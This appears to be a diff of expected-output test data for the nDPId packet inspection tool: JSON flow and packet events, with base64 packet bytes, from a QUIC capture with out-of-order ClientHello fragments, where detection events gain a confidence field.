+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253509,"flow_last_seen":1621421253509,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621421253509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"133.202.76.105","src_port":64964,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 02294{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1621421253804,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621421253804,"pkt":"AAAAAAAAAAEAnT6cCABFAAViPMJAAH4RBymokEAF1Bb289hQAbsFTib0yf8AAB0IFOutyi98gDkAAEU0cgaq22OVD8Dk3cOFWT0xE9g+YCtQyxjYAZuBA+biQ0qlLk4G4l4FhrZTdWwEHJxix0i32WGF+VFP6SA62mk\/ahCh08zZkteiAklY2im5lzs3+hv5CXVaBoCsdKzK43351bgh7lFz2rLxgClTUrt+ggkqZgyH3xqh52dtUrDyoAHPTLnCu42bYt031EP3XjXnQN0tMqOu6lBcFDhjD4aNjqQ4gVCp9D2V7BmRO3otj4hId4G69dqomvKCMk352TcjhRI9Y\/b1HXLPEwZJR5SMYjM0bHHNJ8TU9yEz2sN8hXpEtMivH1XdJw0Eh8yYm64H83Y0HweIMWoyJiqpIlytTnrgkym64mLXXZYZW20KwPHeajlZF05XF3+pFt+uQ4GzrV5Dcx3AxUpXpEdoKl3n0ELxD0JH5ljs0a9w9Sbz1XKL5rFy7vCM8UkbGTH6qJsw9yuooY6A9x3BRJQldn\/cjpkxSonTfoT4ntKav5Abl2PQ2R\/XKxdCsedHmqW3DEd446DYQ3V85\/1reu7YDBrYnSyXTqTmbkWgxwxd8QGgoAa5urrS4Odki8E\/vxPzpvhWle2+YavjiuVnuPplOSMtA6eRixeu+Twyp\/mNZvJOkN9V44x6h72ppz248KXCbVBzRH+1a3Iw2Xt2l83WqoJ1ekOv8wHN6\/oiQJoJREH+g4zwPsZOsNyZDHhogPOptnRw+QNIjvRsgAplHaOx6D\/aGIthoZ3wqTLG+A+DTy0A7fbLu\/5uA2OrVkih8zEFgbKa96QzE7xsqMQsB29SUtTTgtaJ+x6DDlTxsS4y5GvKhs5RqCJuqJHJsUqQ+7qZO1IlfyqPjfQ4TdX3QR4WMaYivWpDgEtSZdNrgxDq2rS0MQKGr8L9tinW33cwo4ycFk5CyESoY2JbgbQLKBayMDiWClTvZot+D9gQ1USNgzNYyMBTHtywu3XkQJpOb6Cu+Cndw7HuOQ148pj8juCxBmSiBwgMqay2jsiMwE2rp2FJfE2pZCpCtkbGUbTD71AKVtAmD4PfgtOBCxaFvaclNBN01TZzkSP3ySV9xnlyk0aicuahfnr0uqssjLhU2lGOlia1+DO56SRT\/clcAVgh6RL3+lpZujJgQPm5EcCP+wloP7VOsnzWGwL9wZ7hJ40ht20W7jRVj3M6Els4r8Cq410yu5FloDOrNepfpbxjkZc6ldqZDdLri8F2g6JJ17oGz0uM4ZxyqgwoLWq7U+nURI2WoUDTSzDrhufyUwR4DJ9ZV1quggqjhetj0pzAZYuRLflR0X47yy14dCpQ\/vVyn1z2ua4Ul1zLKn5MiWFnBJIu6nyxsGQcno71kQag30voXKBH7HnrnnqUlbqOkjLEl5S\/FyD25Vd5cXtgniVi6A\/QPlDEt7HGYkYWr7\/lkpumd4\/NE+Jp8u8oDIJ2Pl+kBJ\/VZvw2TrQDNhyPOtdvHRPiEX8B8fs+MFSjeA8jQipbDbOQYT8shK9HjK1kt12l1A1WeA2E3iBlpveLOL5cYs7Ony3vhCFnJiyDYilQrHHcfZ4DT7xi8UHB2ER5kb0BMJsGRBThDiMxgHeTo+e7mFH8tDgNfGqLuRHyVlf8NgieuPUXEgyKmqYEc4LvmX4l2717+gqPnFHj\/U1TWUHnb92m5p6KStXy9LMrfKKfgW3hZcvDQuM0RslMbJ8u36V\/B9KSp7x2ODcgpxNNuc+y4vHSpU+\/5E4AvDNNuskmG4wvM2AAovGTD43c7ggngGXtjGnBtB4EnktPIpxqtYgo+FpqvKts45sp"}
 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1621421253809,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621421253809,"pkt":"AAAAAAAAAAEAnT6cCABFAAViPMNAAH4R\/\/6okEAFhcpMaf3EAbsFToEwzP8AAB0Izn33GI1xCTwAAEU0rIRdWSpQJq8RNm\/YHCWv+5lOAS3ExdrQfSyR3179\/1dRds5Ne7rTKilnr5qOATiPuwy9kvVwvXmlvh9A4pBwrdy5rwj\/oK+soxKE65UpWeIIcbWAdsENETDsJvZbt2iOx1FT02Zh0k4wZRYa9T1mqEIw9vucjUxsVJqzuUcDQocELhq992N4Y\/d7WHUCkfrvzFkWLhfQuDRyyFD+FKVASnwCfjWwtYzJWfj8xdfdTc5foWxQy8HwatcneUH3Xe7KQloP91UPff0ZYs++gTR2OGCqiGo9QElgV7ipEPa\/a2VVjCezu0CEeDpnKAtNRmt6Q4uTlIuuLMwbpsrTE0g\/MqtsqQu5OpuusA8+8yooJk3wiUUBIcxT0LyFbbJBiUpy1jybiKvHv7sxWdofXLuT2tOVm\/gYEKYpYhJ2fQxRlq05FJNYAJ3x+IPKgL4hZDLQvZau5wz24pWxuyqaqk\/7pdJCP6tcxGJEigvqrGszDAU6Vnuxr\/raz+JVrdGz71r261HwLy7jCLV4GVAGwqXYjimp+lVj7ZrdOYwdRbkgTFkqZGqGyKwNKcvkP\/vIHt\/aqsMYIwNldiK9WOSo4NjVWqS9IQGKVhUKZzlXrupygWzjxqeGR5dlZJFEihDxxcQCXNUgswqiXbBiU7jvlnjci\/Wa5nSBAjcoxUjUtEV\/Hmpt8r23oBWTbgRE9axl1IWGAHI2tDK8zoknUr82ajxFez+Gh0wDV\/MCeDcDUfVqAg5v+qUe56To\/xvqvZFgwQiXcqe7gIfrPgAP8QI6n6FSGGFXoDNKL9zay3oJBh5pSSHq1DCM9w1SKpHiwhq80tTvMNgKeuRDzvkzeQ9vDiuRQ1F0\/isFVcoHn1e2\/Qp6mJR8Lg6OjGTB5n9wJt0GQq6bX9nGsaRw4XAmHHPfPtRRrzAXpU5KuOSCBB0+ShvIxmEYlsFhYFhXfYMIaUqR+yhlwtPSDafAHcOechwW\/ra57z3xNbXAdhHXxU99F54Cb3HNcttIif3ThTZ5o7GOV8r62PLfOpQ7VeKZhnB9VXymajUkSEgKnVtYFRaDjiFok1vqKqx3wzDiPNSqp7GpEl\/yN2vdzXQrfZOp+0yTLLStC7aJ2V0VsJ8NuI036psv9S1AnkXkUUyeZqLHQXmxWBVEUWEJ4aw\/ZZNwpJ2tHF897PYgr1CTWWw4CttMzQLaBZ51eX4RHRn9kLCgvlyq1tMUT+4YjYbnn8RYbz9eqTM4rSN8tz92KR9Fcc0\/dMjAdKRSNurGmNpDEtITPjaUb1n5VBZmMevuy+YULm\/K0LRcgr3bjEgYFGgamvIUyTxG2IxIE6DmCy+rl9rr5F+rE4LgtHzkBPE4gC8ikWb\/UxYBUsyEZNAp4YWExPD5uevZdPSpVZ7j7K7PYss5uBH8TZFtKaqXjAaBFvo8+Iamk14Oh0pgrgxGqB5+UxZOAubhS2tMB7iGe14ZAIAuXL57InGtj0kim3J\/3bjlX1lKzHdAjJDSJtTIdaauSA4wIm+5djes7nIN5l8yHcP+jbpw79vdXui0DIhf0YIIf42Ya8fgEVunYI3yggTOU1wruhfAOOAN7F7YY31Q8MJfLj0qlihs1B3a0b\/W6jVRhMJ+QZ5ut1F8vzQhkHEbOYzm8VcH35XK0f1lM+HrHe56zOhDCcJ1Uiq\/nKgQwd8FV+HuWjkyGI8NRs6aas3Ro+mmhQzK2gIzxAmNbNSP65H2kIq72CE6rc1ZiknuHgwgzCMtoH6gzt2XSxfShl6CHvNrwhQToP6hE8gE"}
 00623{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421257105,"flow_last_seen":1621421257105,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621421257105,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"112.1.105.138","src_port":55844,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02289{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1621421257105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621421257105,"pkt":"AAAAAAAAAAEAS1QMCABFAAViPbFAAH4R97iokEAFcAFpitokAbsFTiafzP8AAB0IMK4bzt32gQ0AAEU0P1azBnSUVl3HX4NvBpNVZqFjb\/POClmZ90yDhIH3saXV4D8hIZuhFmh5K80mFHsQUDzJ5Fet2Vi6MVVm5vzpbtDzb3iZEgIWreSd3Ir9FMXdj0HVjyEDw6EuT6gRAjE\/21rarOXtm19YMu7r45cH8xqJwZu0MlI7uXzcE9RAeMgLEW6YsSaB9O66L2651H8GQJ90pVw7t2KzRklpg4gkXdUjv94LX0mxpP01vTf1Uur6iVP0hra2u3O5GqhBWtCeqqhiUxynXsEiIqqL7erxJ4C5Ceo+YBLOH7PyZpxjMcY0M8UKVHZb40RZzejcLgSUNrM70SQtZDilREUjdX4V1RitcpSnBwGOqBO33JSlA32uZ9lAm7tfb4HtFuyOK7Y6+s36I\/tJjlWkNcLN5vycOCCgMR\/iEDhDBTaJipsDN7UZescDsrCVRT5tibuo42Z352l3NEmt8qok03JQNTlENsa+Ywn9406L57nvC0pFdYqO6XoWy3oIaLpLL2+6gTc60MDWTKJ1UrBBU+uti2j2vV131OfFLy9NEug6HDeJt07pHoN0abz03ktCcugMdfCJCqkojUbtwT7bcr1xv+H+nfxzLGaBENVle48BJL9n\/fQwRUFpWqNRw5YGEoFUAxgSYLrjI3+8yOHpS2TW54iDb5TgzKjzNgy7VC2hqyxs\/JyaWpx4tfVLM7fnb3BOMLq3RoDDAtkcsoDjHUMbZOotwqG7NOHSskx0+10KvcYYmNrJIaQaFda2wEUxuliGNz92g6FqP4oZMZQBZxkpxPDgYdYLuH0duracuo87qqjlRGPQapq15Je3yha81nzNRXHTDeNDxWfcXJluZNq0kt+qGDFlSY8n8xUueL9DqKmN1IsXo0X0yoNp38aEiv4BJxrbHkZ8MuGE\/2IEPBTeie7PMbLFS2yJwVIy5h4KShSAWHX8g3+pMhTlu25endl0GCcr5li4yhDfLpQ3S0rInsXaqmpIA6OYG89d6KlcK52aGKa5+qjgFprLpAqwYT5Z65JHNpW+TG9KZbT2vFhcZengw3A92EI\/TcEXiRfmF2ssJ5ysj+mCfUOmyip94PexKb+mHdBLChKLXIrLeY1uTln0pTICSsA32Tt+soXhVUyCfGQOxc2GxwvPc6T20BN51nQPn600Q5UViN3viKdCuJEUlNLh+yWrsxCBLb17rH5uegaqgsAUwjH1c2UBlUjKpOyFZ+vURC9HPm3ZN\/AmFoBypd++hTChaH8TxLeog0xRzbwHCm0PbKFRbASn2bhiLaCoa2lU2VL20lJE+ax9ltZKxjkLaHbInU1egJzE5Ozq274xYL+oZA2MHpO\/SvXg5YcqmFZBb7QU7uJnGtoC6VyfqEMbfITMloZv6UlVclDscyjvESn6K4S5HE2T1Di30EscldcqKgvxZsNQVrOrtKLdcYnpHdO2rWcwupv3J3uhq2VmkdCL9eV1aP+\/omm+CRR4vmacmNO+0VUXWSYWY1o0ANvSXclIcPCmXoAeFks9hejblFemNUPDYGzI5F7uu7XOa7qRlrb4VRHYDm+IGHatsOChH\/ovC2i1ER0eU\/ZmnhnIkZU97Pyha243JnjMkAwY9QrCN0+FUsuH91rZG9m+lGHaPJ\/jVLdm2lAyDFa+zibx5uvSnW8CxhmkBIgZ+LcWtx9SaKCxT1Vc9Xf2EVqaZNITbzO2oIGdrJDJ4HVczVgPNlPqogSnBzFP5Ik8qoDJ7h6Q4BUKLPyjQd\/ev7WJ1EEQcjfoVc2KFDAa9tCVQaFSH39b"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421257105,"flow_last_seen":1621421257105,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621421257105,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"112.1.105.138","src_port":55844,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421257105,"flow_last_seen":1621421257105,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621421257105,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"112.1.105.138","src_port":55844,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00623{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421260215,"flow_last_seen":1621421260215,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621421260215,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"37.47.218.224","src_port":59827,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02300{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1621421260215,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621421260215,"pkt":"AAAAAAAAAAEAgb5NCABFAAViPkBAAH4R0KWokEAFJS\/a4OmzAbsFTgQMzv8AAB0Ij53aBXaFj90AAEU0SLKO1gj8GM\/7BPKLNut3gQPWBzQn5YjeWsRqAQjUyhVmdT7iLh+mIwvgIVvzUOLJxhHjuQctv0LRX631bbBEMMF3pBOdFjFZQIZkKsJpfaTuV+rwxUnU2bHKeVloIebl9Hd03S1kOttznSJAQXPQYVQdCo2nGLaWCR4YNzOkZh4A+Iglp3ynlFiH1Kgq3ax2c8pTIXpNl9L3OjDkEQQYoqa4BnvX26mCDoVc1q85ueAmXRWZdEScZQq5AdybLm23nnSrRgIVtgrwmK88QIPr5bJG3kChUFNEb6Qj326VwodIu2nJl3TnhY2xrD54TcIiyK8M1mjcjF66nfwNKkEIT6E\/SESFufOVlvOb\/aB7WAdl9ft+Mim9U4BlJLbA1M2hEMXyNr\/s6u+cjHBsYueURjL6cyap74D70FwK4fSE9fk3xYY2MNPKF\/BAL97jnAn1k6A2tqzJHsZwSzyyXpoLuyctUW\/+nvBXA28d0MohSUQ+k04\/p827rPYEI2AWonQSMbQCAz0aXMWa9QgMEzO1kdWGqTKHT6GRgMR41luSMkba7gddevQoGSDn8n\/q9o1I96kD59QkNrWXvBgRpPjPEDuAZN3lTvhkhI1wkMsnQCh+3FDr1mc7ThSOHVDvrHj1Lm33pCihRhcviFSvDh9KDt2ldWi8CRH3IP27mXAgwEWN7MW58CZ7xIfXHX426siygUSb80QcGh0MbC2cqC6NdXb7jwDX+dBo9j\/62Zx0AC29OcRJNYu2PToqGFzb0MsLqQh6dq9QT4wGAMMKTUCoC77oTHhUvrLWjGCXOjuULsdJuEozP8mmiwHfyW6om2UpbFP3XUkziu\/vMyloESiBOvaG1xmOFxFd2n7o08eusUshscLGHeSq3kK1TNkYBgJH7lGzZYlF3A1w0YXAbAoRDewGZBRGgAycWnJxG9uq\/6QiUS5MkDVeUWNCVal9TwMX5\/i+60rZCuCCsNfpwFYF65Kddt1lyUiJ3yQQ3yrEC81\/+AlvSh0nVJu7TD4+IV4yfqhOezTjS\/jq7q0STXO9D1O5OiHCPhH1vWKx7PnZg2bufgr0umZWt9\/ulektccxj\/7G2bU+FhscpVONsqMMSe8nszXl1RfQbopA6Lr2XL+yzBEuqedNG\/oarLdzVzfbciDEAHhtO2umw8IL7MpmOpbUsppzeNfDP5NjrfxdP3ZZ6+53+pyzcLVc1IIupv0HiBGLs39L3xCnLaO9KJhlGu4\/NgXTntIMz6nwsIjU3XYs9p681vW714W+A\/9BGND8qAN+OH91XxSG84vJV\/6Q94Q6u6XMjJ1a8fRCqQvwG6Y6QlpageJG0MkaaEcPNuZR6lcsvvgXozmz12VWNDD7XlkC9RlIetaFOlO+wCjrAWaaad7F01KTsrONi0Minvqx6ZjHIYa4CdvnQmfIFPvRG2dbtVMue5p2IpRYRTQ00H124FWSAbpmFufFkxzz3roNFvZ8L48qlRvbqfoHbzlo+diCyOjTzCaiLy3wgom7EMWMSpa1wNanraUOP0Cgafhkkk58UkpZ84qvXH6P3NJfusjarmU4bkoENsKKZG84yQKYpg9lzqxivHXVnRw8D\/wblKD0B6HjUVdnwNG6dMjeNePdobGQc+ezoD\/iBkZC2nsQG9kk\/83\/KYDIo1frQ9PGAUp9fb1fO3JXbQdb7gxYJ59BL9yWuwgkXl0w63hIxIfYXlPi6Ly8hrunM3g6mrjaqyyX2Rcbv6s+jqMK\/tNm146acDlsVlCvaDwMeJ0jY3HGC1re9"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421260215,"flow_last_seen":1621421260215,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621421260215,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"37.47.218.224","src_port":59827,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421260215,"flow_last_seen":1621421260215,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621421260215,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"37.47.218.224","src_port":59827,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1621421260513,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621421260513,"pkt":"AAAAAAAAAAEAgb5NCABFAAViPk5AAH4R0JeokEAFJS\/a4OmzAbsFTtDzzv8AAB0Ij53aBXaFj90AAEU0pVcIObrUqLyarXAGM4rQnKh+52v7aXQUj4GvYb\/wSM3mSBNf9xPhl9FK4ipC+fhOPIGStb9x1zMsHAo+73hJqwqHkOJ6bvqIt\/sGsmK\/ofAbwetCqPp3T3jPrhZY2wETFAN+9XScTYEDqUnrkDVy0GQ9sV5jSug2PtRHEWT8gywc4K+57NH6Ash2BqW8UNx67owC0vArWq8CvngpIrDNQreXdzSYn4wwYJX2miwA\/wEl0gm+SuEtBprHj2uZlu8koRLbrv1VGIheOQE0Nsbta5SQsxKKjZN97iHSxerp4BcNtjqivy7Li78i5gH\/2pVLdrR0qv8negi\/kKSblvjfoEPy4ijg9\/u4RIwFeksyqF89on0NdQuL2+Gj5diZo+zdIi+Q5e5It+HBsRtpXguuRB6SEpGadVpkaDn0YwXpYgs1txuTawl7yQ4ZuSlTzVEDd7qtQzM6lSpvLx3uSWpFvM3GAUysnOzVg41krR4Ulkj+VTnN5KAol+nOz6IUyDJ\/IkiNKdoNBVXk9AvQ0S1r+og06pTejXAB5wfjkpZVXgsRY+N\/xjKDMGEVHELh5Epoie736CGpcBsBBIKZcR8DMnHyPpGJLzAlOtKDi7\/Gt1\/jx+MHSSEKCZ4TotHxg\/Xf1RgIKf3lQnbUe3aB\/BOL3vek35mgVs7wyrmKZQpuJFMrj\/LPS2T3Q6UihyVSZ+cz9VtJhU0kIVXZbg7MeMCnqgv\/yNMDFFdkvKL7oO\/uUcUXQlY5VoYeeWgNSKc3XjyJMIAV+31aTEM5FsgjpZRp0sNQm59Xb20piAIn8k+RicW\/PxKQpSBnnGgYgJK8jaPlnBgEXw4IIpTVsui1MIn1bGpT5SlOh5TYtcpeX7Eq2Gn++tj8GvDhyQ4KPUI1FbbJ0NbqPqngUTYVzF2pjPV2RsKl8tMqOs19XG5pvHEWTNic8cZYT8FgNSHC44qfM5PGUK0zq0\/PiawZaqUQYRh2PCe37WABPV97AV1GUOIJPd1hL9x+acIY52OdywDA\/3ZRhz5AH3VOtXi6eFcGzu2Z1on4V\/38mIWBpYZnh4O771WNLcVabHuK1h65ee736lPwAH1pmFpETlxU2aR14ZxWeG\/L1t\/uMh1SsDCguq7KQ7kO6W6v78BBvY3UFcMUOQm3Y79YpovoK3RKpLlQwqcGToRvTj9HWy45cQaegkrn6dkZvlPtVXm4u0bH0vMFgb+e9S\/Eo9e7MRlTrDXo2UnQkJhJrgWtcgvYsSe2mckaREDq5dc\/ejmdjc6w7425wByLtdYkeZKJsBJlRzzSwJcvg13az06KgVs\/MgeRqXRnkapWJu4JtcC0OoEfpVDvdMByMpq6F01Orvj99pih8TBfE5K9cwc7o7eRFGa\/vbR8mRB4vs\/zIS2xlYSXBpmrEq\/STtlWQ3MwDGTQBh6b1fNakGwhN+beHXCdenc2JEHwzcegc84ZFNYAaFHvYtEA5j\/sdHZ5R7zQpmw8s757IIPaEVgddHeol88L1qAA1ESXtRCjHYy+RZMYFJvwihgljin3jiK2udMMWEQO4P1W\/JF0TJv+oob679cUTxkmK0rhv5xSAjzbEBoPpZkQFmxUaC6gROBGQvRXx3h\/KdYcwayetIOWHEWFh0VV8+Wh3MzCdnjJMXP+plFSgGMbc+RC\/vLnsb2eKO8LMYQ0pI9YKYByfpqJs3guXOtrpg3uzEalWzsyVUl9MKGOQYcVvIVpCkpNZnvU\/i5cNJONYeYNbIy\/q5jUt2zwSPACITT+6UtXWpul6XNl"}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421316093,"flow_last_seen":1621421316093,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621421316093,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"241.138.147.133","src_port":51053,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1621421316093,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621421316093,"pkt":"AAAAAAAAAAEAVM4PCABFAAViQV5AAH4RSIeokEAF8YqThcdtAbsFTsw1yP8AAB0Id4dqLmNRgiwAAEU0wtYlbbuFGBXp2MCVE6We3QfitRrLbfHeFapauAVaYK5AL9PTMbG\/nZBDDFATIm20jlpnFDBXnrozoSQkKhZiwvFuA+YJAKUvqg2QPKM3oU8xpfKkT2AQR0J9DkN5tfQ0NXF6X7eJrYc4ofmRw8O4fWLwYHZ3YywSIJBBxpk3DxsC2udaDZJvqGhhrqx5lxHNdgWl7nWJub5bWqgA7RiFwSfPMI\/5kRug+dhYRp7DC3Ee8zC6gPghQE+QP0amaa1arTeTP0yuasl+WnsmI9atR02R+W1DzVE2\/wBMK8xOVHY9tqlEVzRvN\/FEe84ZW3K+FiAVxrMfFrQuHuvcnbcHTHBnMHQYqazejyT6z7dujWBncKjH6yckijpEXWZXNsAuDtLV5T3g2q3nsAzYqPmxjAwq2L9jEUkACO\/glUxPaUIbzRZMAWrn1JnfawlUtFWDoUkmp2jeSdN3M4DOV4Btcfl6JE0S5mBMR+cTfbMcWTfdpp7BQFYSHPJCCmfpgjfpU+1qBx\/swhbFbhxpxlnelvZfSKLGYtrKIMbdO3dvXbJ\/svUATGYLFdU0QPDusq4rUjjYNOu89YeAlu27MHBziCZnV7KQ\/7CZZ62vBer12fSYwgYC9kFuhA1vCwIWWEI0nqiCF8WEuILGWjP7tGrAuxfQQVo5hc9wDgMsePag6LNkwHcnSN4R4KOS1V6VWYmSISoheOtUuN0\/+N31BX\/BBdcE+K\/zMLfLAbEeSVyqVT8J149AtoSXuMJboIYDsPyuNx1sUrvqH1bQF\/7OvXtx\/cdwuq0y9FpLI4rLUI2maANSTyvT2wXdthl04Z\/YTlfhB2d0v18nfSnZ0lHIWro94Qz9tRk3pZNg\/6bOm24Nb0c7krS9oaKWYD\/nW26GWKUOS\/YmbucW\/B1591GDEr7Vz9Medns2YxuZHMa760vt8vLL\/edsarlqSTG7iC2dyVOn2D7FBqAY9O0XPf2C6QywOMobFqtrNOS8\/ww+Ef0n0CBYfsd8N\/A33enCbf65kj2J8cjGSNsKKNBj4tAphcU4pREZZB+O3\/Ly1nrLSiPKqvrwDlraB5bWLyenPZKnd0anwZjJixIGkNqzXa4ISQSJFmR1apCq9LxUfCQKJSnoHJi7zWpvIrTdh+1E4LBshyGiVHdr861ZeGlKojdwmnjQq4UIgYBm588gXH6fnrUcTY6x5R5SkG6ySP3+9FKCni2sN+s4jOB1WugJuAizD3hNzwNrPVPmY7ea2u9AgEEAbZ5tqDi\/qty5LhlhUJfgz0tpuOOG5sjNxDfBKwkmMXzbB0UWP\/ZOymvNdRvIO7mkPx8fUewze1kB2XBKTZu\/jjeqOfyykDMv2U5d4ECIcR1ME5SBUPF+cG4JDZip3X9Ncjk8ohwZ9STseLqJ9OTjbovHrwRkTp9ZFiBkXSVMJZ28qvMwt56L7k\/AJJHbrnWAxnK7I23CERceW6rAMx3gAvjR7jpii0Z6y9ut3843URcFEKSmPwW484nhFdNDcZj2opvoj2jz3w5PYglOwvrlo53izXLdla3jEPq0EWSsFCgjfCn1Hu\/0iFm0F9A\/NJaZOLHbBv95sOyVAyhhTp9ia8OHAoDyKO3fdAgduAMCr8e4e6A6OeMRMM9uZdO8nPHniB7\/fRhFarX8\/hBQLOvGYNTxmX4mUBEYAvdX9oiTEGFxFQYms4wxcWEcL4GBZVSteaongl\/UtzVPYTVaH6Ywp9r8fQxMP+pvN9mS74aDwI6voKY5QYc+FIAxKgJlDQtsiDCfBJp7"}
